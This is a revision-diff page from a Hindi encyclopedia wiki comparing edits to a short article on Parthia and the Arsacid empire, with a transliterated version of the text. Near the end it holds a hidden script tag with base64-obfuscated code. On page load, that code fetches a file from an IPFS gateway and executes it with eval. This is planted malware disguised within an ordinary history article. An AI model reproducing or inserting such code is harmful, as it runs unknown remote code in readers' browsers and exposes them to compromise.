Difference between revisions of "पार्थिया"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
(7 intermediate revisions by 4 users not shown)
Line 1: Line 1:
*[[बैक्ट्रिया]] के पश्चिम और कैस्पियन सागर के दक्षिण पूर्व में पार्थिया का प्रदेश था, जिसके निवासी जातीय दृष्टि से ग्रीक लोगों से सर्वथा भिन्न थे।  
+
'''पार्थ या पार्थिया''' ([[अंग्रेज़ी]]: ''Parthia'') [[बैक्ट्रिया]] के पश्चिम और [[कैस्पियन सागर]] के दक्षिण पूर्व में स्थित एक ऐतिहासिक प्रदेश था, जिसके निवासी जातीय दृष्टि से ग्रीक लोगों से सर्वथा भिन्न थे।
*सीरियन साम्राज्य की निर्बलता से लाभ उठाकर उन्होंने विद्रोह कर दिया और 248 ई. पू. के लगभग स्वतंत्र पार्थियन राज्य की स्थापना हुई।  
+
 
*पार्थियन लोगों के इस विद्रोह के नेता अरसक और तिरिदात नामक दो भाई थे।  
+
*यहाँ कभी पार्थी लोग अपना साम्राज्य चलाया करते थे, जो 247 ईसा पूर्व से 224 ईसवी तक चला। इस साम्राज्य को 'अशकानी साम्राज्य' के नाम से भी जाना जाता है।
*इन भाइयों ने धीरे—धीरे पार्थियन राज्य की शक्ति को बहुत बढ़ा लिया, और कुछ समय बाद सम्पूर्ण [[ईरान]] उनकी अधीनता में आ गया।
+
*सीरियन साम्राज्य की निर्बलता से लाभ उठाकर पार्थी लोगों ने विद्रोह कर दिया था और 248 ई. पू. के लगभग स्वतंत्र पार्थियन राज्य की स्थापना हुई।  
 +
*पार्थियन लोगों के इस विद्रोह के नेता 'अरसक' और 'तिरिदात' नामक दो भाई थे। इन भाइयों ने धीरे-धीरे पार्थियन राज्य की शक्ति को बहुत बढ़ा लिया, और कुछ समय बाद सम्पूर्ण [[ईरान]] उनकी अधीनता में आ गया।
 
 
 
 
 
+
{{लेख प्रगति |आधार= |प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
 
 
 
 
{{लेख प्रगति
 
|आधार=आधार1
 
|प्रारम्भिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
[[Category:नया पन्ना]]
+
==संबंधित लेख==
[[Category:विदेशी_स्थान]]
+
{{विदेशी स्थान}}
[[Category:इतिहास_कोश]]
+
[[Category:विदेशी_स्थान]][[Category:भूगोल कोश]][[Category:इतिहास_कोश]]
 
__INDEX__
 
__INDEX__

Latest revision as of 08:10, 21 June 2014

parth ya parthiya (aangrezi: Parthia) baiktriya ke pashchim aur kaispiyan sagar ke dakshin poorv mean sthit ek aitihasik pradesh tha, jisake nivasi jatiy drishti se grik logoan se sarvatha bhinn the.

  • yahaan kabhi parthi log apana samrajy chalaya karate the, jo 247 eesa poorv se 224 eesavi tak chala. is samrajy ko 'ashakani samrajy' ke nam se bhi jana jata hai.
  • siriyan samrajy ki nirbalata se labh uthakar parthi logoan ne vidroh kar diya tha aur 248 ee. poo. ke lagabhag svatantr parthiyan rajy ki sthapana huee.
  • parthiyan logoan ke is vidroh ke neta 'arasak' aur 'tiridat' namak do bhaee the. in bhaiyoan ne dhire-dhire parthiyan rajy ki shakti ko bahut badha liya, aur kuchh samay bad sampoorn eeran unaki adhinata mean a gaya.

 

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

sanbandhit lekh